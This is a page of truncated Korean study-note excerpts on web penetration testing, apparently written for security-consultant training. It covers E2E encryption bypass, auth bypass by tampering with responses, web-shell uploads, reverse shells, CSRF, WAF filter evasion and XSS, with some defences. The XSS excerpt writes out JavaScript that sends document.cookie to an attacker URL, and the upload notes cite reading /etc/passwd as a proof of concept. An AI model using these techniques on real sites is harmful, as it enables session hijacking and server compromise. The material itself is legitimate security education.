금취분평(웹/모바일/Home Trading System) - 금융거래가 있는곳에서는 [전자금융]항목을 확인해야함. 일반페이지에서는 금취분평중 전자금융 항목을 제외 ** 이용자 입력정보 보호 > 비밀번호, otp번호 등의 입력이 탈취당할 수 있다고 생각. -> E2E(End to End)암호화 -> 키보드 입력 순간 암호화. > 전송 버튼 클릭 순간 함수실행 - > ID를 확인. - > 함수 확인 prompt(Real Data, this.data) E2E우회 1. prompt함수 사용해서 전송 전 띄우고 데이터 변조 가능. 2. E2E암호화 off 암호화가 on/off가 가능한경우가 있음 q=aeopjfpamefpasdkjf[asdmlfw[ejfamewljf-efmksjfe &e2e=true 이 경우 fa..
버퍼 오버플로우 / 포멧 스트링 => 나오지 않음 c언어로 이루어진 웹서버에서 발생함 그러나 현제 c언어 기반 웹이 거의 없음 1. 버퍼 오버플로우 CPU - Memory -----------HardDisk 명령 일하기 전 프로그램 프로그램 클릭시 어셈블리어로 작성된 명령어가 메모리로 적제됨 실행 명령어를 올려둠 메모리에 명령이 올라간 상태를 프로세스 프로세스가 존재하는 영역 : stack, heap 스텍에 명령이 잠깐씩 기록됨. 변수마다 크기가 지정되어있음 만약 20글자짜리 변수의 경우 20자 이상의 값이 할당될 경우 다른 영역을 덮어씀 => 프로그램이 꼬임(죽음) = > DOS가 가장 쉬움 코드 중간에 함수가 호출될 경우 함수로 가서 코드를 실행하고 다시 원래 코드로 돌아갈 주소를 스텍에 저장해둠 만..
1. 인증/인가 취약점 1.1. 인증/인가 - 인증 : 그 사람이 맞는지 확인하는 작업 -> 로그인 인증 - 인가 : 허락된 사람에게 어떠한 권하는 부여 -> 파라미터값 변조, 쿠키값 변조. 1.2. 인증/인가 CASE 1. 인증우회 -> 클라이언트측 인증 무시 가능. [-]hsts : 강제로 https 연결을 하게 하는 것. AUTU 로그인 우회하기 : 로그인 한 사람만 보이는 페이지. but JS코드로 href로 페이지를 이동시키나 실제로는 페이지는 전부 로드됨. step1.php로 이동 . intercepter에서 do intercept response로 응답값 변경 가능 이를 반복하는 것은 matchand replace로 변경가능 미사일 날리기 : 로그인해서 페이지에 들어갈 경우 관리자만 이용가능..
File Upload : 공격자가 임의의 파일을 업로드 하는 공격 취약점 발생 원인 :업로드 되는 파일 검증이 미흡 시나리오 1. 웹 쉘_ : 웹 쉘은 POC코드와 같이 테스트 하는 것. 리버스쉘은 탐지가 되기에 빠르게 해야함. 2. DOS공격 3.디페이스 공격 : index.html을 업로드해서 변조 4. 페이지변조 (피싱) 5. 악성코드 유포(xss) 대응방법 1. 업로드 되는 파일을 DB에 저장. 바이너리 파일로 저장 -> CLOB / BLOB 2. NAS에 파일을 저장 단, 이 서버는 php와 같은 웹 서버가 설치되면 안됨. -> 업로드 되는 파일이 저장되는 서버를 웹서버와 분리 3. 파일 검증 - 확장자 검증 - 파일 시그니쳐 검증 - MIME TYPE 검증 **다른 확장자 실행 방법 (ex. ..
-- File Upload 공격 : 공격자가 임의의 파일을 업로드 할 수 있는 공격. -> 웹 쉘 ( 바인드 쉘) -point 1. 우리가 웹 서버에서 실행 할 수 있는 파일이 무엇인지를 보아야 함. 2. 그걸 실행이 가능해야 함. 웹 브라우저로 우리가 올린 파일을 요청 ->업로드된 파일의 위치를 알아야 함. 3. 웹 쉘 업로드 및 실행. 웹 쉘 업로드시 일반적인 공격 방법 cat /etc/password => poc 코드 1. 일반적으로 웹서버의 소스코드를 탈취 -> DB를 탈취하는것과 같음 ( 일반적으로 DB의 계정정보는 소스코드 내에 존재) 가장 먼저 보는곳은 SQL문이 있는곳. -> SQL문을 사용하는데에 DB계정 정보 존재. 2. Revers Shell연결 : nce 명령어로 7777포트를 연결..
- SQL Injection - XSS - CSRF - File Upload/ Download - 인증/인가 xpath XSSE OS injection 등 모두 xpath 공격 CSRF : 피해자가 자신도 모르게 임의의 요청을 보내는 공격 CSRF/ XSS 차이 : 두 공격의 정의를 한번 짚어주는 것이 좋음. CSRF에서 XSS를 사용하면 공격 성공률이 증가함. 서버측 공격(but. 이용자인 클라이언트를 공격하나 서버에게 요청을 하기에 서버측 공격이라 표현하기도 함.) CSRF 발생 위치 : 모든 요청 -> 컨설턴트의 주관이 필요함. ex) 게시판 글작성. but 관리자만이 쓸 수 있는 곳. or 광고글을 사용 가능한 곳 - 공격 기법 ( 무조건 로그인 상태에서 공격됨) 1) GET Method : UR..
-Anti XSS Bypass -> Black List 기반 필터링 WAF. 일반 방화벽은 IP주소와 포트번호만으로 차단. WAF는 웹에플리케이션 기반으로 요청을 열어보고 막아줌. 이는 패턴 기반임. 대부분의 WAF는 XSS가 막힘. 1) Client Side 검증 우회 클라이언트측에서 검증을한다? 말이 안됨. javascript와 같은 언어로 클라이언트측에서 특정언어를 필터링 - > burp swip과 같은 프록시툴을 통하여 변경이 가능 2) Script Load ", ' , alert, function 과 같은 특정 단어를 애매하게 필터링 - > 스크립트를 로드할 수 있음 이는 글자수 제한과 같은 부분에 사용이 가능 3)대소문자 혼용 //버튼을 누를 필요가 없음. //보이지 않는 iframe창을 띄움..
XSS 클라이언트 측 코드를 삽입하는 공격으로 클라이언트 브라우저에서 실행 XSS 시나리오 브라우저에서 실행하는 코드에 따라 가능성은 무궁무진 POC 코드 alert(1) - > 화면에 보이기 때문에 사용 임의의 클라이언트 측 코드가 실행되는것을 보여주기만 하면 됨 Session 탈취 쿠키: document.cookie 이 쿠키값을 공격자 서버로 전송 var cookie = document.cookie; var img = new Image(); img.src = "URL?cookie=" + cookie; 과 같이 HTML은 document.cookie를 접근 못함 삽입한 값이 출력되지만 response에는 보이지 않음 - > 이 값을 만들어내는 곳은 클라이언트 브라우저. document.get Eleme..